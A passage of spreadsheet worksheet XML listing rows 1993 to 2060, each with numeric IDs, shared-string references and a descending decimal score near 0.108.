    </row>
    <row r="1993" ht="15.75" customHeight="1">
      <c r="A1993" s="1">
        <v>25689.0</v>
      </c>
      <c r="B1993" s="2">
        <v>1.4524834E7</v>
      </c>
      <c r="C1993" s="2" t="s">
        <v>1827</v>
      </c>
      <c r="D1993" s="2">
        <v>1.0</v>
      </c>
      <c r="E1993" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1993" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1994" ht="15.75" customHeight="1">
      <c r="A1994" s="1">
        <v>26067.0</v>
      </c>
      <c r="B1994" s="2">
        <v>1.5577603E7</v>
      </c>
      <c r="C1994" s="2" t="s">
        <v>1826</v>
      </c>
      <c r="D1994" s="2">
        <v>1.0</v>
      </c>
      <c r="E1994" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1994" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1995" ht="15.75" customHeight="1">
      <c r="A1995" s="1">
        <v>26109.0</v>
      </c>
      <c r="B1995" s="2">
        <v>1.5813638E7</v>
      </c>
      <c r="C1995" s="2" t="s">
        <v>1828</v>
      </c>
      <c r="D1995" s="2">
        <v>1.0</v>
      </c>
      <c r="E1995" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1995" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1996" ht="15.75" customHeight="1">
      <c r="A1996" s="1">
        <v>26328.0</v>
      </c>
      <c r="B1996" s="2">
        <v>1.6720064E7</v>
      </c>
      <c r="C1996" s="2" t="s">
        <v>1829</v>
      </c>
      <c r="D1996" s="2">
        <v>1.0</v>
      </c>
      <c r="E1996" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1996" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1997" ht="15.75" customHeight="1">
      <c r="A1997" s="1">
        <v>26498.0</v>
      </c>
      <c r="B1997" s="2">
        <v>1.753715E7</v>
      </c>
      <c r="C1997" s="2" t="s">
        <v>1830</v>
      </c>
      <c r="D1997" s="2">
        <v>1.0</v>
      </c>
      <c r="E1997" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1997" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1998" ht="15.75" customHeight="1">
      <c r="A1998" s="1">
        <v>27398.0</v>
      </c>
      <c r="B1998" s="2">
        <v>2.1801267E7</v>
      </c>
      <c r="C1998" s="2" t="s">
        <v>1831</v>
      </c>
      <c r="D1998" s="2">
        <v>1.0</v>
      </c>
      <c r="E1998" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1998" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1999" ht="15.75" customHeight="1">
      <c r="A1999" s="1">
        <v>27517.0</v>
      </c>
      <c r="B1999" s="2">
        <v>2.2167347E7</v>
      </c>
      <c r="C1999" s="2" t="s">
        <v>1811</v>
      </c>
      <c r="D1999" s="2">
        <v>1.0</v>
      </c>
      <c r="E1999" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1999" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="2000" ht="15.75" customHeight="1">
      <c r="A2000" s="1">
        <v>27943.0</v>
      </c>
      <c r="B2000" s="2">
        <v>2.3846991E7</v>
      </c>
      <c r="C2000" s="2" t="s">
        <v>1832</v>
      </c>
      <c r="D2000" s="2">
        <v>1.0</v>
      </c>
      <c r="E2000" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2000" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="2001" ht="15.75" customHeight="1">
      <c r="A2001" s="1">
        <v>28186.0</v>
      </c>
      <c r="B2001" s="2">
        <v>2.5006496E7</v>
      </c>
      <c r="C2001" s="2" t="s">
        <v>1833</v>
      </c>
      <c r="D2001" s="2">
        <v>1.0</v>
      </c>
      <c r="E2001" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2001" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="2002" ht="15.75" customHeight="1">
      <c r="A2002" s="1">
        <v>29113.0</v>
      </c>
      <c r="B2002" s="2">
        <v>3.043397E7</v>
      </c>
      <c r="C2002" s="2" t="s">
        <v>1834</v>
      </c>
      <c r="D2002" s="2">
        <v>1.0</v>
      </c>
      <c r="E2002" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2002" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="2003" ht="15.75" customHeight="1">
      <c r="A2003" s="1">
        <v>29241.0</v>
      </c>
      <c r="B2003" s="2">
        <v>3.0844182E7</v>
      </c>
      <c r="C2003" s="2" t="s">
        <v>1835</v>
      </c>
      <c r="D2003" s="2">
        <v>1.0</v>
      </c>
      <c r="E2003" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2003" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="2004" ht="15.75" customHeight="1">
      <c r="A2004" s="1">
        <v>29334.0</v>
      </c>
      <c r="B2004" s="2">
        <v>3.1333074E7</v>
      </c>
      <c r="C2004" s="2" t="s">
        <v>1836</v>
      </c>
      <c r="D2004" s="2">
        <v>1.0</v>
      </c>
      <c r="E2004" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2004" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="2005" ht="15.75" customHeight="1">
      <c r="A2005" s="1">
        <v>29604.0</v>
      </c>
      <c r="B2005" s="2">
        <v>3.3567932E7</v>
      </c>
      <c r="C2005" s="2" t="s">
        <v>1837</v>
      </c>
      <c r="D2005" s="2">
        <v>1.0</v>
      </c>
      <c r="E2005" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2005" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="2006" ht="15.75" customHeight="1">
      <c r="A2006" s="1">
        <v>29786.0</v>
      </c>
      <c r="B2006" s="2">
        <v>3.5022539E7</v>
      </c>
      <c r="C2006" s="2" t="s">
        <v>1838</v>
      </c>
      <c r="D2006" s="2">
        <v>1.0</v>
      </c>
      <c r="E2006" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2006" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="2007" ht="15.75" customHeight="1">
      <c r="A2007" s="1">
        <v>30018.0</v>
      </c>
      <c r="B2007" s="2">
        <v>3.6165804E7</v>
      </c>
      <c r="C2007" s="2" t="s">
        <v>1839</v>
      </c>
      <c r="D2007" s="2">
        <v>1.0</v>
      </c>
      <c r="E2007" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2007" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="2008" ht="15.75" customHeight="1">
      <c r="A2008" s="1">
        <v>30116.0</v>
      </c>
      <c r="B2008" s="2">
        <v>3.6820722E7</v>
      </c>
      <c r="C2008" s="2" t="s">
        <v>1840</v>
      </c>
      <c r="D2008" s="2">
        <v>1.0</v>
      </c>
      <c r="E2008" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2008" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="2009" ht="15.75" customHeight="1">
      <c r="A2009" s="1">
        <v>30151.0</v>
      </c>
      <c r="B2009" s="2">
        <v>3.7042415E7</v>
      </c>
      <c r="C2009" s="2" t="s">
        <v>1841</v>
      </c>
      <c r="D2009" s="2">
        <v>1.0</v>
      </c>
      <c r="E2009" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2009" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="2010" ht="15.75" customHeight="1">
      <c r="A2010" s="1">
        <v>30278.0</v>
      </c>
      <c r="B2010" s="2">
        <v>3.7728212E7</v>
      </c>
      <c r="C2010" s="2" t="s">
        <v>1842</v>
      </c>
      <c r="D2010" s="2">
        <v>1.0</v>
      </c>
      <c r="E2010" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2010" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="2011" ht="15.75" customHeight="1">
      <c r="A2011" s="1">
        <v>30876.0</v>
      </c>
      <c r="B2011" s="2">
        <v>4.6306025E7</v>
      </c>
      <c r="C2011" s="2" t="s">
        <v>1843</v>
      </c>
      <c r="D2011" s="2">
        <v>1.0</v>
      </c>
      <c r="E2011" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2011" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="2012" ht="15.75" customHeight="1">
      <c r="A2012" s="1">
        <v>30881.0</v>
      </c>
      <c r="B2012" s="2">
        <v>4636273.0</v>
      </c>
      <c r="C2012" s="2" t="s">
        <v>1844</v>
      </c>
      <c r="D2012" s="2">
        <v>1.0</v>
      </c>
      <c r="E2012" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2012" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="2013" ht="15.75" customHeight="1">
      <c r="A2013" s="1">
        <v>31065.0</v>
      </c>
      <c r="B2013" s="2">
        <v>4.8061761E7</v>
      </c>
      <c r="C2013" s="2" t="s">
        <v>1845</v>
      </c>
      <c r="D2013" s="2">
        <v>1.0</v>
      </c>
      <c r="E2013" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2013" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="2014" ht="15.75" customHeight="1">
      <c r="A2014" s="1">
        <v>31600.0</v>
      </c>
      <c r="B2014" s="2">
        <v>5.1342336E7</v>
      </c>
      <c r="C2014" s="2" t="s">
        <v>1846</v>
      </c>
      <c r="D2014" s="2">
        <v>1.0</v>
      </c>
      <c r="E2014" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2014" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="2015" ht="15.75" customHeight="1">
      <c r="A2015" s="1">
        <v>32272.0</v>
      </c>
      <c r="B2015" s="2">
        <v>5.5279249E7</v>
      </c>
      <c r="C2015" s="2" t="s">
        <v>1847</v>
      </c>
      <c r="D2015" s="2">
        <v>1.0</v>
      </c>
      <c r="E2015" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2015" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="2016" ht="15.75" customHeight="1">
      <c r="A2016" s="1">
        <v>32306.0</v>
      </c>
      <c r="B2016" s="2">
        <v>5.5614665E7</v>
      </c>
      <c r="C2016" s="2" t="s">
        <v>1848</v>
      </c>
      <c r="D2016" s="2">
        <v>1.0</v>
      </c>
      <c r="E2016" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2016" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="2017" ht="15.75" customHeight="1">
      <c r="A2017" s="1">
        <v>32552.0</v>
      </c>
      <c r="B2017" s="2">
        <v>5752168.0</v>
      </c>
      <c r="C2017" s="2" t="s">
        <v>1849</v>
      </c>
      <c r="D2017" s="2">
        <v>1.0</v>
      </c>
      <c r="E2017" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2017" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="2018" ht="15.75" customHeight="1">
      <c r="A2018" s="1">
        <v>31311.0</v>
      </c>
      <c r="B2018" s="2">
        <v>4969661.0</v>
      </c>
      <c r="C2018" s="2" t="s">
        <v>1850</v>
      </c>
      <c r="D2018" s="2">
        <v>1.0</v>
      </c>
      <c r="E2018" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2018" s="2">
        <v>0.1081871345029239</v>
      </c>
    </row>
    <row r="2019" ht="15.75" customHeight="1">
      <c r="A2019" s="1">
        <v>5655.0</v>
      </c>
      <c r="B2019" s="2">
        <v>4.6287046E7</v>
      </c>
      <c r="C2019" s="2" t="s">
        <v>1851</v>
      </c>
      <c r="D2019" s="2">
        <v>1.0</v>
      </c>
      <c r="E2019" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2019" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="2020" ht="15.75" customHeight="1">
      <c r="A2020" s="1">
        <v>11866.0</v>
      </c>
      <c r="B2020" s="2">
        <v>2.4900431E7</v>
      </c>
      <c r="C2020" s="2" t="s">
        <v>1852</v>
      </c>
      <c r="D2020" s="2">
        <v>1.0</v>
      </c>
      <c r="E2020" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2020" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="2021" ht="15.75" customHeight="1">
      <c r="A2021" s="1">
        <v>17137.0</v>
      </c>
      <c r="B2021" s="2">
        <v>4.8829547E7</v>
      </c>
      <c r="C2021" s="2" t="s">
        <v>1853</v>
      </c>
      <c r="D2021" s="2">
        <v>1.0</v>
      </c>
      <c r="E2021" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2021" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="2022" ht="15.75" customHeight="1">
      <c r="A2022" s="1">
        <v>18296.0</v>
      </c>
      <c r="B2022" s="2">
        <v>5.2311721E7</v>
      </c>
      <c r="C2022" s="2" t="s">
        <v>1854</v>
      </c>
      <c r="D2022" s="2">
        <v>1.0</v>
      </c>
      <c r="E2022" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2022" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="2023" ht="15.75" customHeight="1">
      <c r="A2023" s="1">
        <v>20888.0</v>
      </c>
      <c r="B2023" s="2">
        <v>1.6098933E7</v>
      </c>
      <c r="C2023" s="2" t="s">
        <v>1855</v>
      </c>
      <c r="D2023" s="2">
        <v>1.0</v>
      </c>
      <c r="E2023" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2023" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="2024" ht="15.75" customHeight="1">
      <c r="A2024" s="1">
        <v>21255.0</v>
      </c>
      <c r="B2024" s="2">
        <v>2.003985E7</v>
      </c>
      <c r="C2024" s="2" t="s">
        <v>1856</v>
      </c>
      <c r="D2024" s="2">
        <v>1.0</v>
      </c>
      <c r="E2024" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2024" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="2025" ht="15.75" customHeight="1">
      <c r="A2025" s="1">
        <v>21273.0</v>
      </c>
      <c r="B2025" s="2">
        <v>2.0199312E7</v>
      </c>
      <c r="C2025" s="2" t="s">
        <v>1857</v>
      </c>
      <c r="D2025" s="2">
        <v>1.0</v>
      </c>
      <c r="E2025" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2025" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="2026" ht="15.75" customHeight="1">
      <c r="A2026" s="1">
        <v>23675.0</v>
      </c>
      <c r="B2026" s="2">
        <v>6927518.0</v>
      </c>
      <c r="C2026" s="2" t="s">
        <v>1858</v>
      </c>
      <c r="D2026" s="2">
        <v>1.0</v>
      </c>
      <c r="E2026" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2026" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="2027" ht="15.75" customHeight="1">
      <c r="A2027" s="1">
        <v>28542.0</v>
      </c>
      <c r="B2027" s="2">
        <v>2.6846619E7</v>
      </c>
      <c r="C2027" s="2" t="s">
        <v>1859</v>
      </c>
      <c r="D2027" s="2">
        <v>1.0</v>
      </c>
      <c r="E2027" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2027" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="2028" ht="15.75" customHeight="1">
      <c r="A2028" s="1">
        <v>31393.0</v>
      </c>
      <c r="B2028" s="2">
        <v>4.9989761E7</v>
      </c>
      <c r="C2028" s="2" t="s">
        <v>1860</v>
      </c>
      <c r="D2028" s="2">
        <v>1.0</v>
      </c>
      <c r="E2028" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2028" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="2029" ht="15.75" customHeight="1">
      <c r="A2029" s="1">
        <v>32128.0</v>
      </c>
      <c r="B2029" s="2">
        <v>5.4113315E7</v>
      </c>
      <c r="C2029" s="2" t="s">
        <v>1861</v>
      </c>
      <c r="D2029" s="2">
        <v>1.0</v>
      </c>
      <c r="E2029" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2029" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="2030" ht="15.75" customHeight="1">
      <c r="A2030" s="1">
        <v>32181.0</v>
      </c>
      <c r="B2030" s="2">
        <v>5.4647162E7</v>
      </c>
      <c r="C2030" s="2" t="s">
        <v>1862</v>
      </c>
      <c r="D2030" s="2">
        <v>1.0</v>
      </c>
      <c r="E2030" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2030" s="2">
        <v>0.1081349206349206</v>
      </c>
    </row>
    <row r="2031" ht="15.75" customHeight="1">
      <c r="A2031" s="1">
        <v>3606.0</v>
      </c>
      <c r="B2031" s="2">
        <v>3.9096489E7</v>
      </c>
      <c r="C2031" s="2" t="s">
        <v>1863</v>
      </c>
      <c r="D2031" s="2">
        <v>1.0</v>
      </c>
      <c r="E2031" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2031" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="2032" ht="15.75" customHeight="1">
      <c r="A2032" s="1">
        <v>9576.0</v>
      </c>
      <c r="B2032" s="2">
        <v>5.6066271E7</v>
      </c>
      <c r="C2032" s="2" t="s">
        <v>1864</v>
      </c>
      <c r="D2032" s="2">
        <v>1.0</v>
      </c>
      <c r="E2032" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2032" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="2033" ht="15.75" customHeight="1">
      <c r="A2033" s="1">
        <v>14288.0</v>
      </c>
      <c r="B2033" s="2">
        <v>3.8496087E7</v>
      </c>
      <c r="C2033" s="2" t="s">
        <v>1865</v>
      </c>
      <c r="D2033" s="2">
        <v>1.0</v>
      </c>
      <c r="E2033" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2033" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="2034" ht="15.75" customHeight="1">
      <c r="A2034" s="1">
        <v>19971.0</v>
      </c>
      <c r="B2034" s="2">
        <v>5.7559587E7</v>
      </c>
      <c r="C2034" s="2" t="s">
        <v>1866</v>
      </c>
      <c r="D2034" s="2">
        <v>1.0</v>
      </c>
      <c r="E2034" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2034" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="2035" ht="15.75" customHeight="1">
      <c r="A2035" s="1">
        <v>20166.0</v>
      </c>
      <c r="B2035" s="2">
        <v>1.0398572E7</v>
      </c>
      <c r="C2035" s="2" t="s">
        <v>1867</v>
      </c>
      <c r="D2035" s="2">
        <v>1.0</v>
      </c>
      <c r="E2035" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2035" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="2036" ht="15.75" customHeight="1">
      <c r="A2036" s="1">
        <v>20978.0</v>
      </c>
      <c r="B2036" s="2">
        <v>1.689498E7</v>
      </c>
      <c r="C2036" s="2" t="s">
        <v>1571</v>
      </c>
      <c r="D2036" s="2">
        <v>1.0</v>
      </c>
      <c r="E2036" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2036" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="2037" ht="15.75" customHeight="1">
      <c r="A2037" s="1">
        <v>22026.0</v>
      </c>
      <c r="B2037" s="2">
        <v>3.0120486E7</v>
      </c>
      <c r="C2037" s="2" t="s">
        <v>1868</v>
      </c>
      <c r="D2037" s="2">
        <v>1.0</v>
      </c>
      <c r="E2037" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2037" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="2038" ht="15.75" customHeight="1">
      <c r="A2038" s="1">
        <v>25914.0</v>
      </c>
      <c r="B2038" s="2">
        <v>1.511149E7</v>
      </c>
      <c r="C2038" s="2" t="s">
        <v>1869</v>
      </c>
      <c r="D2038" s="2">
        <v>1.0</v>
      </c>
      <c r="E2038" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2038" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="2039" ht="15.75" customHeight="1">
      <c r="A2039" s="1">
        <v>27415.0</v>
      </c>
      <c r="B2039" s="2">
        <v>2.1815326E7</v>
      </c>
      <c r="C2039" s="2" t="s">
        <v>1870</v>
      </c>
      <c r="D2039" s="2">
        <v>1.0</v>
      </c>
      <c r="E2039" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2039" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="2040" ht="15.75" customHeight="1">
      <c r="A2040" s="1">
        <v>29638.0</v>
      </c>
      <c r="B2040" s="2">
        <v>3.3784591E7</v>
      </c>
      <c r="C2040" s="2" t="s">
        <v>1871</v>
      </c>
      <c r="D2040" s="2">
        <v>1.0</v>
      </c>
      <c r="E2040" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2040" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="2041" ht="15.75" customHeight="1">
      <c r="A2041" s="1">
        <v>31326.0</v>
      </c>
      <c r="B2041" s="2">
        <v>4973765.0</v>
      </c>
      <c r="C2041" s="2" t="s">
        <v>1872</v>
      </c>
      <c r="D2041" s="2">
        <v>1.0</v>
      </c>
      <c r="E2041" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2041" s="2">
        <v>0.1080808080808081</v>
      </c>
    </row>
    <row r="2042" ht="15.75" customHeight="1">
      <c r="A2042" s="1">
        <v>14003.0</v>
      </c>
      <c r="B2042" s="2">
        <v>3.7383699E7</v>
      </c>
      <c r="C2042" s="2" t="s">
        <v>1873</v>
      </c>
      <c r="D2042" s="2">
        <v>1.0</v>
      </c>
      <c r="E2042" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2042" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="2043" ht="15.75" customHeight="1">
      <c r="A2043" s="1">
        <v>22980.0</v>
      </c>
      <c r="B2043" s="2">
        <v>4.9293253E7</v>
      </c>
      <c r="C2043" s="2" t="s">
        <v>1874</v>
      </c>
      <c r="D2043" s="2">
        <v>1.0</v>
      </c>
      <c r="E2043" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2043" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="2044" ht="15.75" customHeight="1">
      <c r="A2044" s="1">
        <v>26202.0</v>
      </c>
      <c r="B2044" s="2">
        <v>1.6237407E7</v>
      </c>
      <c r="C2044" s="2" t="s">
        <v>1875</v>
      </c>
      <c r="D2044" s="2">
        <v>1.0</v>
      </c>
      <c r="E2044" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2044" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="2045" ht="15.75" customHeight="1">
      <c r="A2045" s="1">
        <v>30643.0</v>
      </c>
      <c r="B2045" s="2">
        <v>4.1716753E7</v>
      </c>
      <c r="C2045" s="2" t="s">
        <v>1876</v>
      </c>
      <c r="D2045" s="2">
        <v>1.0</v>
      </c>
      <c r="E2045" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2045" s="2">
        <v>0.1080246913580247</v>
      </c>
    </row>
    <row r="2046" ht="15.75" customHeight="1">
      <c r="A2046" s="1">
        <v>13682.0</v>
      </c>
      <c r="B2046" s="2">
        <v>3.6063462E7</v>
      </c>
      <c r="C2046" s="2" t="s">
        <v>1877</v>
      </c>
      <c r="D2046" s="2">
        <v>1.0</v>
      </c>
      <c r="E2046" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2046" s="2">
        <v>0.1079664570230608</v>
      </c>
    </row>
    <row r="2047" ht="15.75" customHeight="1">
      <c r="A2047" s="1">
        <v>30277.0</v>
      </c>
      <c r="B2047" s="2">
        <v>3.7725834E7</v>
      </c>
      <c r="C2047" s="2" t="s">
        <v>1878</v>
      </c>
      <c r="D2047" s="2">
        <v>1.0</v>
      </c>
      <c r="E2047" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2047" s="2">
        <v>0.1079059829059829</v>
      </c>
    </row>
    <row r="2048" ht="15.75" customHeight="1">
      <c r="A2048" s="1">
        <v>3663.0</v>
      </c>
      <c r="B2048" s="2">
        <v>3.9368302E7</v>
      </c>
      <c r="C2048" s="2" t="s">
        <v>1879</v>
      </c>
      <c r="D2048" s="2">
        <v>1.0</v>
      </c>
      <c r="E2048" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2048" s="2">
        <v>0.1064814814814815</v>
      </c>
    </row>
    <row r="2049" ht="15.75" customHeight="1">
      <c r="A2049" s="1">
        <v>10895.0</v>
      </c>
      <c r="B2049" s="2">
        <v>1.6574691E7</v>
      </c>
      <c r="C2049" s="2" t="s">
        <v>1880</v>
      </c>
      <c r="D2049" s="2">
        <v>1.0</v>
      </c>
      <c r="E2049" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2049" s="2">
        <v>0.1064030131826742</v>
      </c>
    </row>
    <row r="2050" ht="15.75" customHeight="1">
      <c r="A2050" s="1">
        <v>18309.0</v>
      </c>
      <c r="B2050" s="2">
        <v>5.2371982E7</v>
      </c>
      <c r="C2050" s="2" t="s">
        <v>1881</v>
      </c>
      <c r="D2050" s="2">
        <v>1.0</v>
      </c>
      <c r="E2050" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2050" s="2">
        <v>0.1064030131826742</v>
      </c>
    </row>
    <row r="2051" ht="15.75" customHeight="1">
      <c r="A2051" s="1">
        <v>5729.0</v>
      </c>
      <c r="B2051" s="2">
        <v>4.6603494E7</v>
      </c>
      <c r="C2051" s="2" t="s">
        <v>1882</v>
      </c>
      <c r="D2051" s="2">
        <v>1.0</v>
      </c>
      <c r="E2051" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2051" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="2052" ht="15.75" customHeight="1">
      <c r="A2052" s="1">
        <v>15612.0</v>
      </c>
      <c r="B2052" s="2">
        <v>4.3518863E7</v>
      </c>
      <c r="C2052" s="2" t="s">
        <v>1883</v>
      </c>
      <c r="D2052" s="2">
        <v>1.0</v>
      </c>
      <c r="E2052" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2052" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="2053" ht="15.75" customHeight="1">
      <c r="A2053" s="1">
        <v>17550.0</v>
      </c>
      <c r="B2053" s="2">
        <v>5.0205538E7</v>
      </c>
      <c r="C2053" s="2" t="s">
        <v>1884</v>
      </c>
      <c r="D2053" s="2">
        <v>1.0</v>
      </c>
      <c r="E2053" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2053" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="2054" ht="15.75" customHeight="1">
      <c r="A2054" s="1">
        <v>18982.0</v>
      </c>
      <c r="B2054" s="2">
        <v>5.4385597E7</v>
      </c>
      <c r="C2054" s="2" t="s">
        <v>1885</v>
      </c>
      <c r="D2054" s="2">
        <v>1.0</v>
      </c>
      <c r="E2054" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2054" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="2055" ht="15.75" customHeight="1">
      <c r="A2055" s="1">
        <v>20747.0</v>
      </c>
      <c r="B2055" s="2">
        <v>1.4793134E7</v>
      </c>
      <c r="C2055" s="2" t="s">
        <v>1886</v>
      </c>
      <c r="D2055" s="2">
        <v>1.0</v>
      </c>
      <c r="E2055" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2055" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="2056" ht="15.75" customHeight="1">
      <c r="A2056" s="1">
        <v>21561.0</v>
      </c>
      <c r="B2056" s="2">
        <v>2.368356E7</v>
      </c>
      <c r="C2056" s="2" t="s">
        <v>1887</v>
      </c>
      <c r="D2056" s="2">
        <v>1.0</v>
      </c>
      <c r="E2056" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2056" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="2057" ht="15.75" customHeight="1">
      <c r="A2057" s="1">
        <v>21712.0</v>
      </c>
      <c r="B2057" s="2">
        <v>2.546287E7</v>
      </c>
      <c r="C2057" s="2" t="s">
        <v>1888</v>
      </c>
      <c r="D2057" s="2">
        <v>1.0</v>
      </c>
      <c r="E2057" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2057" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="2058" ht="15.75" customHeight="1">
      <c r="A2058" s="1">
        <v>21841.0</v>
      </c>
      <c r="B2058" s="2">
        <v>2.7119811E7</v>
      </c>
      <c r="C2058" s="2" t="s">
        <v>1889</v>
      </c>
      <c r="D2058" s="2">
        <v>1.0</v>
      </c>
      <c r="E2058" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2058" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="2059" ht="15.75" customHeight="1">
      <c r="A2059" s="1">
        <v>24343.0</v>
      </c>
      <c r="B2059" s="2">
        <v>1.0717699E7</v>
      </c>
      <c r="C2059" s="2" t="s">
        <v>1890</v>
      </c>
      <c r="D2059" s="2">
        <v>1.0</v>
      </c>
      <c r="E2059" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2059" s="2">
        <v>0.1063218390804598</v>
      </c>
    </row>
    <row r="2060" ht="15.75" customHeight="1">
      <c r="A2060" s="1">
        <v>24749.0</v>
      </c>
      <c r="B2060" s="2">
        <v>1.1815341E7</v>
      </c>
